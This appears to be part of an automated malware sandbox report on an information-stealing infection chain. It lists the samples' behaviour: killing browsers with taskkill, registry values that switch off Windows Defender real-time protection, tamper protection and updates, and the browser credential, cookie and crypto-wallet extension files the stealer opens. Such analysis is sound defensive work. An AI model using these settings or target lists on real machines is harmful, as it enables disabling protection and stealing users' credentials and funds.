Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 036e90e395.exe, 0000000B.00000002.2882888364.0000000000572000.00000002.00000001.01000000.0000000F.sdmp, 036e90e395.exe, 0000001F.00000000.2980992335.0000000000572000.00000002.00000001.01000000.0000000F.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CT1ROX8L8OCI432H.exe, CT1ROX8L8OCI432H.exe, 00000003.00000002.2413589136.000000000049D000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: \_PProgram Manager
Source: firefox.exe, 00000019.00000002.2999696329.000000851DC3B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: skotes.exe, skotes.exe, 00000006.00000002.2366078572.00000000006C8000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: RProgram Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003096001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003096001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: file.exe, 00000000.00000003.2150740963.0000000001772000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 4.2.R4UI5PZ4W045Z6XA.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2288392617.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2607283101.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2349959438.00000000004D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.3059276891.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2365987556.00000000004D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2325690009.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2328973567.0000000000751000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2309749751.0000000004890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 036e90e395.exe PID: 5316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 3440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 21024c5511.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 21024c5511.exe PID: 4228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 26.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.996773cd54.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.996773cd54.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000002.3081504525.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3081627351.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2911813021.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2876974078.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.3066155076.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2819953969.0000000000CD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2876408637.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2813065067.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2876347937.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.2857907960.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.3066029603.0000000000861000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2771688785.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3084290708.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3005019658.0000000000CD1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.2857985543.000000000087E000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 996773cd54.exe PID: 5644, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 996773cd54.exe PID: 3960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 5680, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003096001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: 21024c5511.exe, 0000000E.00000003.2956600611.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: 21024c5511.exe, 0000000E.00000003.2956600611.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 21024c5511.exe, 0000000E.00000003.2956600611.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 21024c5511.exe, 0000000E.00000003.2973927647.0000000001064000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: ExodusWeb3
Source: 21024c5511.exe, 0000000E.00000003.2956600611.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
